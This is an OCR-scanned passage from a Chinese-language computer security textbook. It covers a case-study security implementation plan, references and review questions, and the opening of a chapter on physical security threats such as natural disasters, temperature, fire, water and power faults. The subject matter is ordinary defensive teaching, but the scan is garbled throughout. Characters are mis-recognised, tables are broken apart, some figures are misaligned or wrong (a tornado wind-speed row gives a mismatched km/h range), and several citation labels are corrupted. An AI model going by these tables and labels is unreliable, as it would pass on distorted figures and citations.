该 选择 这 样 的 控制 措施 : 一 旦 将 它们 用 于 所 有 相关 服务 器 ， 就 应 该 能 够 充分 解决 这 些 风 险 。 

最 后 一 个 风险 与 电子 邮件 的 可 用 性 、 完 整 性 和 保密 性 相关 。 正 如 在 风险 评估 中 提 到 的 ， 这 
主要 是 母 公司 管理 外 部 邮件 网 关 的 IT 集团 的 责任 。 在 本 地 站 点 上 能 做 的 工作 很 少 。 一 般 控制 
措施 的 使 用 都 将 会 帮助 减少 这 一 风险 ,特别 是 与 客户 端 恶意 代码 保护 以 及 垃圾 邮件 、 间 谍 软 件 
保护 相关 的 一 些 控制 措施 。 除 此 之 外 ， 作 为 应 急 规划 和 事件 响应 策略 与 规程 的 一 部 分 ， 我 们 应 
该 考虑 建立 一 个 电子 邮件 备份 系统 。 为 了 安全 起 见 ， 该 系统 使 用 和 公司 内 部 网 络 分 离 的 客户 端 
系统 ， 连 接 到 一 个 外 部 的 本 地 网 络 服务 提供 商 。 在 公司 内 部 的 电子 邮件 系统 受到 损害 时 ， 这 个 
连接 将 为 关键 消息 提供 受 限 的 电子 邮件 能 力 。 

K 15-5 总 结 了 对 可 能 的 控制 措施 的 分 析 。 该 表 也 列 出 了 确定 的 控制 措施 以 及 实施 的 优先 
级 。 还 必须 对 这 张 表 进 行 扩 展 ， 应 该 将 所 需要 的 资源 、 责 任 人 员 、 时 间 期 限 以 及 其 他 建议 的 详 
细 信 息 都 包括 进来 。 然 后 就 可 以 实施 这 个 计划 ， 并 对 其 进展 进行 适宜 的 监视 。 在 该 计划 成 功 实 
施 之 后 ， 一 些 更 长 期 的 后 续 工 作 就 会 随 之 产生 ， 这 些 后续 工 作 是 为 了 确保 新 的 策略 一 直 被 恰当 
地 应 用 ， 以 及 确保 对 公司 的 安全 状况 进行 定期 评审 。 届 时 将 开始 新 一 轮 的 风险 评估 、 计 划 制 定 
以 及 相应 的 后 续 工 作 。 


表 15-5 银 星 矿业 一 一 实施 计划 


风险 (资产 /威胁 ) | 风险 等 级 推荐 的 控制 措施 已 选 控制 措施 
所 有 风险 (普遍 适用 ) ”| 。 | 1 服务 器 的 配置 和 定期 维护 策略 Pome Ok 
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(8) 


风险 等 级 推荐 的 控制 措施 已 选 控制 措施 


2. 恶意 代码 (垃圾 邮件 / 间谍 软件 ) 预防 
3. 关于 服务 器 的 审计 监视 、 分 析 、 归 约 和 报告 
4. 应 急 计 划 和 事件 响应 策略 与 规程 

5. 系统 备份 与 恢复 规程 





风险 (资产 /威胁 ) 


















所 有 风险 (普遍 适用 ) 









a he 











SCADA 结 点 和 网 络 的 
可 靠 性 与 完整 性 







1 关键 文档 审计 
eee RF) 如 高 | 2. 文 档 创 建 与 存储 策略 3 " 
3 用 户 安全 教育 与 培训 3 












财务 、 采 购 和 维护 / 生 
产 系 统 的 可 用 性 与 完整 性 


电子 邮件 的 可 用 性 、 完 


| 
整 性 和 保密 性 1. 应 急 计 划一 备份 电子 邮件 服务 
15.7 ”推荐 读物 


在 [MAIW02] 和 [SLAY06] 中 可 以 找到 有 关 IT 安全 管理 更 一 般 的 讨论 内 容 。 当 前 在 
IT 安全 管理 领域 最 佳 实践 都 被 编辑 在 一 系列 的 国际 和 国家 标准 中 ， 我 们 推荐 使 用 这 些 标 
准 ， 包 括 [ISO13335]、[ISO27001]、[ISO27002]、[ISO27005]、[NIST06]、 BUEN [NIST11] 
和 [NIST12]. 


(通用 控制 措施 ) 





18013335 ISO/IEC, “ISO/IEC 13335-1:2004—Information technology 一 Security 
techniques— Management of information and communications technology 
security — Part 1: Concepts and models for information and communications 
technology security management,” 2004. 

18027001 ISO/IEC, “ISO/IEC 27001: 2005— Information technology — Security 
techniques— Information security management systems — Requirements,” 2005. 

ISO27002 ISO/IEC, “ISO/IEC 27002:2005 — Information technology — Security 
techniques — Code of practice for information security management,” 2005. 
Formerly known as ISO/IEC 17755:2005. 

ISO27005 ISO/IEC, “ISO/IEC 27005:2011 — Information technology— Security 
techniques — Information security risk management,” 2011. 

MAIW02 Maiwald, E., and Sieglein. W. Security Planning & Disaster Recovery, 
Berkeley, CA: McGraw-Hill/Osborne, 2002. 

NIST06 National Institute of Standards and Technology. Guide for Developing 
Security Plans for Federal Information Systems. Special Publication 800-18 
Revision 1, February 2006. 

NISTO9 National Institute of Standards and Technology. Recommended Security 
Controls for Federal Information Systems. Special Publication 800-53 
Revision 3, August 2009. 

NIST11 National Institute of Standards and Technology. Managing Information 
Security Risk: Organization, Mission, and Information System View. Special 
Publication 800-39, March 2011. 

NIST12 National Institute of Standards and Technology. Risk Management Guide 
for Information Technology Systems. Special Publication 800-30 Revision 1, 
September 2012. 

SLAY06 Slay, J., and Koronios, A. Information Technology Security & Risk 
Management, Milton, QLD: John Wiley & Sons Australia, 2006. 
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15.8 ”关键 术语 、 复 习题 和 习题 


关键 术语 

change management (变更 管理 ) management control (管理 控制 措施 ) 

configuration management (配置 管理 ) operational control (操作 控制 措施 ) 

control (控制 措施 ) preventative control (预防 性 控制 措施 ) 

countermeasure (对 策 ) safeguard (保障 措施 ) 

detection and recovery control (检测 与 恢复 控制 措施 ) security compliance (安全 符合 性 ) 

implementation plan (实施 计划 ) supportive control (支持 性 控制 措施 ) 

IT security plan (IT 安全 计划 ) technical control (技术 控制 措施 ) 532 
复习 题 


15.1 给 出 安全 控制 或 保障 措施 的 定义 。 

15.2 列 出 并 简单 地 定义 三 个 控制 大 类 ， 以 及 每 一 大 类 中 包含 的 三 个 类 别 。 

15.3 ”针对 表 15-3 中 给 出 的 三 个 控制 大 类 分 别 列举 一 个 具体 的 例子 。 

15.4 列 出 详细 说 明 选 择 和 实施 控制 措施 的 步骤 。 

15.5 列 出 三 种 能 够 降低 残余 风险 级 别 的 实施 新 的 或 者 改进 的 控制 措施 的 方法 。 

15.6 列 出 在 IT 安全 实施 计划 中 应 该 包含 的 项 目 。 

15.7 列 出 并 简单 地 定义 在 IT 安全 管理 中 实施 控制 措施 阶段 的 要 素 。 

15.8 组 织 的 安全 官 在 实施 计划 时 需要 检查 哪些 内 容 ? 

15.9 列 出 并 简单 地 定义 在 IT 安全 管理 中 后 续 工 作 阶段 的 要 素 。 

15.10 ”变更 与 配置 管理 作为 整体 系统 管理 过 程 与 作为 组 织 IT 安全 风险 管理 过 程 的 关系 是 怎样 的 ? 


习题 


15.1 考虑 在 习题 14.2 中 讨论 的 “由 于 蠕虫 和 病毒 侵 人 系统 导致 文件 的 破坏 ”对 “系统 文件 中 客户 和 金 
融 数 据 文件 的 完整 性 ”造成 的 风险 。 从 表 15-3 中 选择 一 些 合适 的 能 够 降低 该 风险 的 控制 措施 ， 并 
说 明 你 认为 其 中 哪 一 项 最 合算 。 

15.2 考虑 在 习题 14.3 中 讨论 的 因为 “职员 的 经 济 欺骗 行为 ， 改 变 了 账目 记录 ”从 而 导致 对 “服务 器 端 
账目 记录 的 完整 性 ”造成 的 风险 。 从 表 15-3 中 选择 一 些 合适 的 能 够 降低 该 风险 的 控制 措施 ， 并 说 
明 你 认为 其 中 哪 一 项 最 合算 。 

153 考虑 在 习题 14.4 中 讨论 的 因为 “对 Web 服务 器 的 攻击 和 主页 的 破坏 ”从 而 导致 对 “公司 Web 服务 
器 的 完整 性 ”造成 的 风险 。 从 表 15-3 中 选择 一 些 合 适 的 能 够 降低 该 风险 的 控制 措施 ， 并 说 明 你 认 
为 其 中 哪 一 项 最 合算 。 

154 考虑 在 习题 14.5 中 讨论 的 因为 “对 机 密 信息 和 敏感 信息 的 窃取 和 破坏 ”从 而 导致 对 “存储 在 服务 
器 上 的 用 于 对 客户 进行 渗透 测试 的 技术 和 这 些 测试 结果 的 保密 性 ”造成 的 风险 。 从 表 15-3 中 选择 
一 些 合适 的 能 够 降低 该 风险 的 控制 措施 ， 并 说 明 你 认为 其 中 哪 一 项 最 合算 。 

15.5 ”考虑 在 习题 14.6 中 讨论 的 因为 “偷窃 笔记 本 电脑 ， 从 中 获得 机 主 的 个 人 信息 ， 并 且 利 用 这 些 信息 ” 
从 而 对 “存储 在 未 加 密 的 笔记 本 电脑 中 的 个 人 信息 的 保密 性 ”造成 的 风险 。 从 表 15-3 中 选择 一 些 
合适 的 能 够 降低 该 风险 的 控制 措施 ， 并 说 明 你 认为 最 划算 的 是 哪个 。 

15.6 考虑 在 习题 14.7 中 讨论 的 对 一 个 小 型 公共 服务 机 构 进行 评估 后 的 风险 。 选 择 出 你 认为 最 关键 的 风 
险 ， 并 从 表 15-3 中 选择 一 些 适当 的 能 够 降低 该 风险 的 控制 措施 。 并 说 明 你 认为 其 中 哪 一 项 最 合算 。 [533 
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学 习 目标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

© 概述 不 同类 型 的 物理 安全 威胁 ; 

© 评估 不 同 物理 安全 避免 和 缓解 措施 的 价值 ; 


© 讨论 物理 安全 破坏 的 恢复 措施 ; 
© 理解 个 人 身份 验证 标准 在 物理 安全 中 的 作用 ; 
© 解释 作为 物理 访问 控制 系统 一 部 分 的 PIV 机 制 的 应 用 。 





[PLAT14] 对 信息 系统 (Information System, IS) 安全 的 三 个 基本 要 素 进 行 了 如 下 区 分 : 
o BLS (logical security): 保护 以 计算 机 为 基础 的 数据 免 受 基于 软件 和 基于 通信 的 威 
胁 。 本 书 的 大 部 分 内 容 讨 论 的 都 是 逻辑 安全 。 
© 物理 安全 (physical security): 也 叫 作 基础 设施 安全 。 保 护 存 储 数 据 的 信息 系统 和 使 用 、 
操作 、 维 护 这 些 系统 的 人 员 的 安全 。 物 理 安 全 也 必须 防止 任何 类 型 的 能 够 危及 逻辑 安 
全 的 物理 访问 或 者 人 侵 。 
e 整体 安全 ( premise security) : 也 被 称 作 公司 或 工厂 安全 。 保 护 一 个 完整 区 域内 的 人 和 
财产 、 设 施 和 建筑 ( 群 ) 的 安全 ， 而 且 这 也 是 法 律 、 规 章 和 最 基本 的 义务 所 要 求 的 。 整 
体 安 全 提供 了 周边 安全 、 访 问 控 制 、 烟 火 检测 、 火 灾 控 制 、 环 境 保护 ， 以 及 通常 的 监 
控 系 统 、 警 报 和 警卫 。 
本 章 主要 讨论 物理 安全 及 与 整体 安全 重 倒 的 一 些 部 分 。 我 们 分 析 了 针对 物理 安全 的 一 些 威 
胁 以 及 避免 、 减 轻 和 恢复 这 些 威胁 的 方法 。 为 了 实施 一 个 物理 安全 项 目 ， 组 织 必须 进行 风险 评 
估 ， 以 确定 用 于 确保 物理 安全 的 资源 数量 以 及 用 于 抵御 各 种 威胁 的 资源 分 配 情况 。 此 过 程 同 样 
适用 于 逻辑 安全 。 评 估 和 计划 过 程 已 在 第 14 章 和 第 15 章 中 讲述 过 。 


16.1 概述 


对 于 信息 系统 ， 物 理 安全 的 作用 就 是 保护 那些 进行 信息 存储 和 信息 处 理 的 物理 资产 的 安 
全 。 物 理 安全 包括 两 个 互补 的 要 求 。 首 先 ， 物 理 安全 必须 防止 对 物理 基础 设施 ， 即 那些 维持 信 
息 系统 运转 的 物理 设备 的 损害 。 广 义 上 讲 ， 基 础 设施 包括 以 下 几 类 : 
e 信息 系统 硬件 ( information system hardware) : 包括 数据 处 理 和 存储 设备 、 传 输 和 网 络 
设备 ， 以 及 离线 的 数据 存储 介质 。 我 们 这 里 把 辅助 文档 也 包括 进来 。 
e 物理 设施 (physical facility): 安装 系统 和 网 络 组 件 的 建筑 物 和 其 他 的 组 成 部 分 。 
o 支撑 设施 (supporting facility): 那些 支撑 信息 系统 运转 的 设施 ， 包 括 电 力 、 通 信服 务 和 
环境 控制 (温度 、 湿 度 等 ) 设施 。 
o AR (personnel): 包含 控制 、 维 护 和 使 用 信息 系统 的 人 。 
其 次 ， 物 理 安全 必须 阻止 那些 对 于 物理 基础 设施 的 误 用 ， 这 些 误 用 会 导致 被 保护 的 数据 被 
误 用 或 者 被 损坏 。 物 理 基 础 设施 的 误 用 可 能 是 偶然 的 也 可 能 是 恶意 的 ， 它 包括 故意 破坏 、 盗 取 
设备 、 盗 取 拷贝 、 盗 取 服 务 和 非 授权 进入 。 
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16.2 ”物理 安全 威胁 


这 一 节 ， 我 们 首先 看 一 下 能 够 对 信息 系统 构成 威胁 的 客观 环境 和 突 发 事件 。 有 很 多 对 这 些 
威胁 进行 分 类 的 方法 。 理 解 信 息 系 统 威胁 的 型 谱 ( spectrum of threat) 是 很 重要 的 ， 这样， 那些 
负责 的 管理 员 就 能 够 保证 防御 措施 是 全 面 的 。 我 们 对 各 种 威胁 进行 以 下 分 类 : 

e 环境 威胁 

e 技术 威胁 

e 人 为 威胁 

我 们 从 讨论 自然 灾害 开始 ， 它 是 主要 的 但 不 是 唯一 的 环境 威胁 来 源 。 接 下 来 我 们 详细 地 探 
讨 环境 威胁 ， 然 后 是 技术 威胁 和 人 为 威胁 。 


16.2.1 自然 灾害 

对 于 数据 中 心 、 其 他 信息 处 理 设备 和 操作 它们 的 人 员 来 说 ， 自 然 灾 害 是 大 多 数 环境 威胁 的 
源头 。 通 过 对 不 同类 型 自然 灾害 进行 风险 评估 并 采取 合适 的 预警 ， 是 可 以 防止 由 自然 灾害 造成 
的 重大 损失 的 。 

表 16-1 列 出 了 6 种 不 同类 型 的 自然 灾害 、 每 类 灾害 事件 的 典型 预告 时 间 、 是 否 需要 进行 
人 员 转 移 或 转移 是 否 可 行 ， 以 及 每 类 灾害 事件 的 持续 时 间 。 我 们 简单 地 评述 一 下 每 种 灾害 可 能 
会 引起 的 后 果 。 


R16-1 自然 灾害 的 特征 
TIL 
zen airman 
sn sei, RETARD 


#& 4: ComputerSite 工程 公司 (ComputerSite Engineering. Inc.) 
龙卷风 能 够 在 其 所 经 之 处 产生 超过 飓风 威力 的 大 风 。 对 于 设施 、 屋 项 和 外 部 设备 都 有 构成 
巨大 破坏 的 可 能 ， 还 可 能 有 空中 残骸 造成 的 损害 。 在 龙卷风 经 过 的 范围 之 外 ， 也 能 导致 局 部 设 
施 不 可 用 和 通信 的 暂时 中 断 ， 这 些 破坏 通常 比较 容易 恢复 。 龙 卷 风 所 造成 破坏 的 严重 程度 可 以 
参考 表 16-2 (PA BBMGR) 列 出 的 定 级 标准 。 
表 16-2 WEREMMM 
种 类 风速 范围 破坏 程度 描述 


40 一 72 英里 /小 时 轻 度 的 破坏 。 一 定 程度 地 破坏 烟 向 ; 折断 树枝 ; 推倒 根部 较 浅 的 树 ; 标 
(64 ~ 116 千 米 / 小 时 ) | 志 牌 损坏 


而 73 一 112 英里 /小 时 中 等 程度 的 破坏 。 下 限 是 飓风 的 起 始 速度 ; 房 顶 表面 剥落 ; 移动 房屋 地 
(117 ~ 180 千 米 /小 时 ) | 基 被 推倒 或 掀 翻 ; 汽车 被 推 下 公路 

113 ~ 157 英里 /小 时 相当 大 的 破坏 。 房 顶 被 撕 下 ; 移动 房屋 被 损毁 ; 大 篷车 被 推倒 ;大 树 被 

(64 一 116 千 米 / 小 时 ) | 折断 或 连 根 氢 起 ; 犹如 轻型 导弹 所 产生 的 破坏 


158 ~ 206 英里 /小 时 严重 破坏 。 房 顶 和 一 些 墙 体 从 结实 的 房屋 上 被 吹 走 或 吹 倒 ; 火车 被 掀 翻 ; 
(253 ~ 332 FAK /小 时 ) | 大 多 数 的 树木 连 根 氢 起 ; 较 重 的 小 汽车 被 吹 离 地 面 和 被 抛 出 


FO 
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( 续 ) 







毁灭 性 的 破坏 。 结 实 的 房屋 被 夷 为 平地 ， 地 基 较 差 的 结构 会 被 吹 走 一 自 
(333 ~ 418 千 米 / 小 时 ) | 距离 ， 小 汽车 被 吹 飞 ， 犹 如 大 型 导弹 造成 的 破坏 
难以 想象 的 破坏 。 坚 固 结构 的 房屋 连 地 基 一 并 被 吹 走 相当 一 段 距离 ， 并 
(419 ~ 512 千 米 /小 时 ) | 瞬间 瓦解 ， 汽 车 大 小 的 导弹 在 空中 飞行 超过 100 码 的 距离 ， 树 被 剥皮 
热带 气旋 是 最 具有 毁灭 性 的 自然 灾害 ， 它 包括 飓风 、 热 带 风 暴 和 人 台风。 飓风 可 能 造成 重大 
的 结构 损坏 和 外 围 设 施 的 损坏 ， 这 与 飓风 的 威力 有 关 。 在 飓风 比 击 的 范围 之 外 ， 对 公共 基础 设 
施 、 公 用 工程 和 通信 还 可 能 造成 区 域 性 的 潜在 破坏 。 如 果 现 场 工作 必须 继续 进行 ,那么 要 为 工 
作 人 员 提 供应 急 处 理 设 备 ， 也 就 是 说 备用 发 电机 是 需要 的 。 更 进一步 ， 负 责 现 场 的 管理 者 也 许 
需要 启动 专门 的 灾后 安全 措施 ， 比 如 说 ， 武 装 警卫 。 


R 16-3 总 结 了 已 被 广泛 应 用 的 萨 菲 尔 /辛普森 飓风 定 级 表 。 通 常 ， 每 类 中 4 个 因素 中 的 
任意 一 个 增加 都 会 加 剧 损毁 程度 [PIEL08]。 


表 16-3 PEER / 辛普森 飓风 等 级 表 


种 类 风速 范围 潜在 的 毁灭 程度 
74 ~ 95 英里 /小 时 4 一 5 英尺 小 
(119 ~ 153 公里 /小 时 ) (1 一 2 米 ) 
多 96 ~ 110 英里 /小 时 6 一 8 英尺 中 等 
(154 ~ 177 公 里 /小 时 ) (2 一 3 米 ) 


范围 广 











111 ~ 130 英里 /小 时 9~ 12 英尺 
(178 ~ 209 公里 /小 时 ) (3~4X) 


131 ~ 155 英里 / 小 时 13 一 18 英尺 
(210 ~ 249 公里 /小 时 ) (4~ 5%) 极端 的 


大 地 震 是 最 大 的 潜在 破坏 事件 并 且 没 有 预告 就 发 生 。 位 于 震中 附近 的 设施 也 许 会 遭受 重大 
的 损害 ， 甚 至 是 完全 的 毁灭 ， 也 会 对 数据 中 心 和 其 他 的 IS 设施 造成 严重 的 和 长 期 的 损坏 。 内 
部 损坏 的 例子 ， 包 括 无 支架 的 电脑 硬件 和 站 内 的 基础 设备 倾倒 ， 也 包括 活动 地 板 的 塌陷 。 人 员 
则 会 受到 碎 玻 璃 和 空中 残 仍 的 威胁 。 现 场 之 外 ， 在 大 地 震 的 震中 附近 ， 损 坏 通常 都 不 小 于 强烈 
飓风 所 造成 的 损坏 。 飓 风 无 法 损坏 的 设施 ， 比 如 公路 和 桥梁 ， 其 可 能 会 被 地 震 捧 毁 或 者 损坏 ， 
这 就 阻止 了 油料 和 其 他 物资 的 运输 。 

如 果 外 部 设备 和 建筑 物 没有 设计 成 可 以 承受 严重 的 冰雪 积压 ， 冰 志和 暴风 雪 就 能 够 导致 
IS 设施 的 损坏 。 在 野外 ， 可 能 会 有 更 大 范围 内 的 通信 和 功能 设施 的 损坏 ， 而 且 公路 变 得 危险 
或 者 无 法 通过 。 

雷击 的 结果 也 可 能 是 毫 无 损伤 ， 也 可 能 造成 重大 灾害 的 。 损 坏 程度 与 雷电 的 接近 程度 以 及 
接地 的 浪 涌 电 压 保 护 器 的 效力 有 关 。 在 户外 ， 可 能 会 造成 电力 中 断 ， 也 有 可 能 引发 火灾 。 

对 于 低 海 拔 、 常 遭受 洪水 侵害 的 地 区 和 那些 位 于 严重 洪涝 地 区 的 设施 ， 我 们 考虑 更 多 的 是 
洪水 的 损害 。 洪 水 造成 的 损坏 可 能 是 严重 的 ， 会 造成 长 时 间 的 影响 并 且 需 要 大 量 清理 工作 。 


16.2.2 ”环境 威胁 


这 类 威胁 是 就 环境 条 件 来 说 的 ， 它 可 能 中 断 信息 系统 的 服务 或 者 损坏 其 中 存储 的 数据 。 在 
户外 ， 可 能 会 对 公共 设施 造成 区 域 性 的 严重 损坏 。 在 强烈 帜 风 的 破坏 下 ， 可 能 要 用 几 天 、 几 周 





» 
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甚至 是 几 年 才能 从 这 个 破坏 事件 中 恢复 过 来 。 

不 合适 的 温度 和 湿度 计算 机 和 相关 设备 必须 在 一 定 的 温度 范围 内 工作 。 大 多 数 计算 
机 被 设计 为 在 10 ~ 32C ZI] (50 ~ 90 F) 运行 。 在 这 个 范围 之 外 ， 系 统 可 以 继续 运行 但 
是 可 能 会 产生 不 可 预料 的 结果 。 如 果 计 算 机 周围 的 环境 温度 升 得 太 高 ， 计 算 机 又 不 能 使 自己 
充分 冷却 ， 那 么 内 部 的 组 件 就 会 被 烧 坏 。 如 果 温度 变 得 太 低 ， 当 打开 电源 的 时 候 ， 计 算 机 不 
能 承受 热 冲 击 ， 就 会 导致 电路 板 或 者 集成 电路 破裂 。 表 16-4 给 出 了 发 生 永 久 损坏 的 温度 临 
界 点 。 


表 16-4 对 计算 机 资源 造成 损坏 的 温度 阅 值 


组 件 或 者 介质 开始 造成 损坏 的 周围 环境 的 持续 温度 
软盘 、 磁 带 等 38C (100 F ) 
光学 介质 49% (120 F ) 
硬盘 66% (150 F ) 
计算 机 设备 79% (175 F ) 
高 压 输 电线 的 热塑性 绝缘 物 125% (257 下) 
纸 制 品 177% (350 F ) 


RR: 数据 来 自 国 家 火灾 保护 协会 


另 一 个 与 温度 有 关 的 问题 是 设备 的 内 部 温度 ， 它 可 能 比 室内 的 温度 高 出 很 多 。 计 算 机 相关 
设备 都 有 自己 的 散热 和 冷却 机 制 ， 但 它们 可 能 依靠 或 者 受到 外 部 条 件 的 影响 。 这 些 条 件 包括 : 
不 正常 的 外 部 温度 ， 电 力 或 者 热力 供应 中 断 ， 通风、 空气 调节 ( HVAC) 服务 的 中 断 ， 以 及 排 
气 口 的 阻塞 。 l 

潮湿 也 可 以 对 电气 电子 设备 造成 威胁 。 设 备 长 期 暴露 在 潮湿 的 环境 下 能 导致 腐蚀 。 冷 凝 也 
能 影响 到 磁性 和 光学 存储 介质 。 冷 凝 还 会 导致 短路 ， 因 此 会 造成 线路 板 损坏 。 潮 湿 也 会 产生 电 
流 效 应 ， 它 将 导致 电镀 ， 就 是 指 金属 会 从 一 个 接头 慢 慢 地 移动 到 相 邻 的 另 一 个 接头 ， 最 后 使 两 
个 接头 连接 在 一 起 。 

干燥 也 是 应 该 关注 的 问题 。 在 长 期 的 干燥 环境 下 ， 某 些 材 料 可 能 发 生 形变 ， 从 而 影响 其 性 
能 。 同 样 ， 静 电 也 会 引发 问题 。 一 个 带电 荷 的 人 或 者 物体 ， 能 够 通过 放电 来 损坏 电子 设备 。 即 
使 是 10V 以 下 的 静电 释放 也 能 损坏 部 分 敏感 电子 线路 ， 如 果 达 到 数 百 伏 的 静电 释放 ， 那 就 能 
对 各 种 电子 线路 产生 很 大 的 损坏 。 因 为 人 体 的 静电 释放 能 够 达到 几 千 伏 ， 所 以 这 是 一 个 不 容 忽 
视 的 威胁 。 

一 般 来 说 ， 为 了 避免 出 现 过 分 潮湿 或 者 过 分 干燥 的 情况 ， 相 对 湿度 应 该 保持 在 40% ~ 60% 
之 间 。 

KAA ”大 概 最 可 怕 的 物理 威胁 就 是 火灾 了 。 它 对 人 们 的 生命 和 财产 都 构成 威胁 。 威 胁 不 
仅仅 来 自 直 接 的 火焰 ， 还 来 自 热 、 释 放 的 毒气 、 灭 火 时 用 到 的 水 以 及 烟 。 而 且 ， 火 灾 还 能 导致 
一 些 公共 设施 损 筑 ， 尤 其 是 电力 设施 。 

火灾 导致 温度 随 着 时 间 而 升 高 ， 而 且 在 一 般 的 建筑 物 中 ， 火 灾 的 影响 遵从 图 16-1 中 的 曲 
线 。 表 16-4 和 表 16-5 给 出 了 不 同 物质 的 熔点 或 者 被 损坏 的 温度 ， 这 也 就 说 明了 在 火灾 发 生 多 
长 时 间 之 后 那些 损坏 开始 发 生 。 

由 火灾 引起 的 烟 造成 的 损坏 也 许 会 葛 延 。 烟 是 一 种 研磨 剂 。 它 聚集 在 没有 密封 的 磁盘 、 光 
盘 和 磁带 驱动 器 的 头 部 。 电 子 火灾 能 够 产生 辛辣 的 烟 ， 这 些 烟 可 能 对 别 的 设备 造成 损坏 ， 也 可 
能 是 有 毒 的 或 是 可 致癌 的 。 


382 FAD 管理 问题 


最 常见 的 火灾 威胁 是 发 生 在 设施 内 部 的 火灾 。 就 像 我 们 后 面 要 讨论 的 ， 我 们 可 以 采取 很 多 
措施 来 阻止 和 减轻 损坏 。 另 一 个 所 要 面 对 的 不 可 控制 的 威胁 是 野火 。 在 美国 西部 、 澳 大 利 亚 的 
一 些 地 方 以 及 很 多 其 他 的 国家 ， 野 火 是 一 个 真正 需要 关注 的 威胁 。 
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图 16-1 测试 火灾 对 建筑 物 影响 的 标准 温度 - 时 间 关 系 


表 16-5 温度 影响 
aa | va | a: | ra 
260°C /500 下 铅 熔化 铸铁 熔化 


326% 618 °F | RRE 硬 钢 熔 化 
415YC /770 了 | 绝缘 钢铁 趋 于 变形 并 露出 内 部 结构 | 


水 的 损害 ”很 显然 ， 靠 近 计 算 机 设备 的 水 或 者 其 他 的 液体 对 设备 造成 了 一 种 威胁 。 主 要 的 
危害 就 是 线路 短路 ， 如 果 电 路 板 的 一 条 线路 带 有 电压 ， 另 一 条 线路 接地 ， 那 么 水 就 在 这 两 条 线 
路 之 间 搭 起 了 一 座 桥 ， 也 就 发 生 了 短路 。 输 水 时 ， 比 如 说 在 水 管 中 的 水 ， 以 及 由 于 雨 、 雪 和 冰 
等 天 气 制 造 的 水 都 会 造成 威胁 。 一 根 水 管 可 能 由 于 管道 上 的 缺陷 或 者 冰冻 而 破裂 。 喷 水 灭火 系 
统 ， 尽 管 具有 防火 功能 ,但 其 对 于 计算 机 系统 、 纸 和 电子 存储 设备 来 说 就 是 一 个 重要 的 威胁 。 
这 个 系统 可 能 由 于 错误 的 温度 传感器 而 被 启动 ， 或 者 水 管 破裂 ， 都 有 可 能 使 水 进入 到 计算 机 
房 。 对 于 大 型 计算 中 心 ， 应 该 保证 其 安装 在 水 源 所 在 楼 层 一 层 或 者 两 层 以 上 的 楼 层 。 由 于 洗手 
间 滋 水 而 造成 设备 损坏 就 是 这 种 威胁 的 一 个 例子 。 

很 少 发 生 但 是 更 具 破 坏 力 的 是 洪水 。 大 多 数 的 损害 来 自 于 水 中 的 悬浮 物 。 洪 水 留 下 的 淤泥 
是 非常 难以 清理 干净 的 。 

化 学 、 辐 射 和 生物 危害 ”化 学 、 辐 射 和 生物 威胁 正 呈 现 增 长 的 态势 ， 既 有 来 自 于 有 意 攻击 
的 威胁 ， 也 有 来 自 于 偶然 事故 的 威胁 。 那 些 具有 破坏 性 的 物质 不 应 该 在 一 个 安装 有 信息 系统 的 
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环境 中 出 现 ， 但 是 意外 或 者 有 意 的 入 侵 都 是 可 能 的 。 单 位 附近 的 有 害 物质 的 泄漏 (比如 说 ， 一 
个 运送 有 害 物质 的 汽车 翻 了 ) 能 通过 通风 系统 或 者 打开 的 窗口 侵入 ;又 如 辐射 可 以 穿 透 围墙 。 
此 外 ， 由 于 附近 的 泄漏 可 能 必须 撤离 工作 人 员 ， 从 而 工作 中 断 。 洪 水 也 能 导致 生物 污染 或 者 化 
学 污染 。 
一 般 来 说 ， 这 些 危害 主要 是 针对 工作 人 员 的 。 但 同时 ， 辐 射 和 化 学 事故 也 能 导致 电子 设备 
损坏 。 
灰尘 ”灰尘 非常 普遍 但 却 经 常 被 忽略 。 尽 管 一 般 的 设备 都 具有 一 定 的 防 尘 能 力 ， 但 即使 是 
纸 和 纺织 品 中 的 纤维 都 具有 磨损 和 轻微 导电 的 功能 。 更 大 规模 的 灰尘 来 自 于 一 些 事故 ， 例 如 ， 
附近 建筑 物 的 定向 爆破 或 者 暴风 带 来 的 野火 的 尘埃 。 一 个 更 可 能 的 来 源 就 是 在 建筑 物 内 部 ， 由 
建造 或 维修 产生 。 
具有 运动 部 件 的 设备 ， 是 最 容易 受到 灰尘 影响 而 损坏 的 ， 比 如 旋转 的 存储 介质 和 计算 机 的 “| 
风扇 。 灰 尘 容易 在 通风 设备 处 聚集 并 降低 散热 器 的 冷却 功能 。 541 
害虫 更 加 让 人 感觉 不 舒服 的 物理 威胁 是 害虫 ， 包 括 各 种 各 样 的 存活 的 生物 ， 如 霉菌 、 昆 
虫 和 路 齿 类 动物 。 潮 湿 容易 引起 菌 类 生长 和 发 霉 ， 这 对 人 员 和 设备 都 是 有 害 的 。 昆 虫 ， 尤 其 是 
那些 哨 木 头 和 纸 的 昆虫 ， 也 是 常见 的 威胁 。 


16.2.3 ”技术 威胁 


这 类 威胁 与 电源 和 电磁 辐射 有 关 。 

电力 ”电力 对 于 一 个 信息 系统 的 运行 是 必需 的 。 所 有 系统 中 的 电气 和 电子 设备 都 需要 电 
力 ,而 且 大 多 数 都 要 求 不 间断 地 供电 。 电 力 使 用 问题 可 大 致 分 为 三 类 : 电压 过 低 、 电 压 过 高 、 
噪声 。 

“4 IS 设备 获得 的 电压 比 正常 工作 的 电压 低 时 就 发 生 欠 电压 ( undervoltage) 现象 。 欠 电压 
现象 表现 为 从 电源 电压 的 暂时 降低 ， 到 电灯 暗淡 (长 期 的 电压 过 低 )， 再 到 停机 。 多 数 计算 机 
都 被 设计 为 可 以 在 低 于 正常 电压 20% 的 低压 环境 下 工作 ， 而 不 会 发 生 关 机 和 运行 错误 。 在 更 
低 电 压 的 环境 下 持续 几 个 毫秒 将 引起 系统 关闭 。 一 般 来 说 ， 不 会 发 生 设备 的 损坏 ， 但 会 导致 服 
务 中 断 。 

更 严重 的 问题 是 过 电压 (overvoltage) 现象 。 由 于 公司 供电 异常 、 一 些 内 部 线路 错误 或 者 
电击 都 能 引起 电压 浪 涌 。 其 损坏 程度 是 关于 浪 涌 的 强度 、 持 续 时 间 、 在 设备 和 电源 间 连 接 的 浪 
涌 电 压 保 护 器 的 效率 的 函数 。 一 个 强度 足够 大 的 浪 涌 能 毁坏 硅 组 件 ， 包 括 处 理 器 和 存储 器 。 

电源 线 同 时 也 是 噪声 的 传导 器 。 在 很 多 情况 下 ， 这 些 噪声 信号 可 以 使 用 电源 的 滤波 电路 来 
消除 ， 但 若 和 电子 设备 的 内 部 信号 相互 影响 ， 就 可 能 引起 逻辑 错误 。 

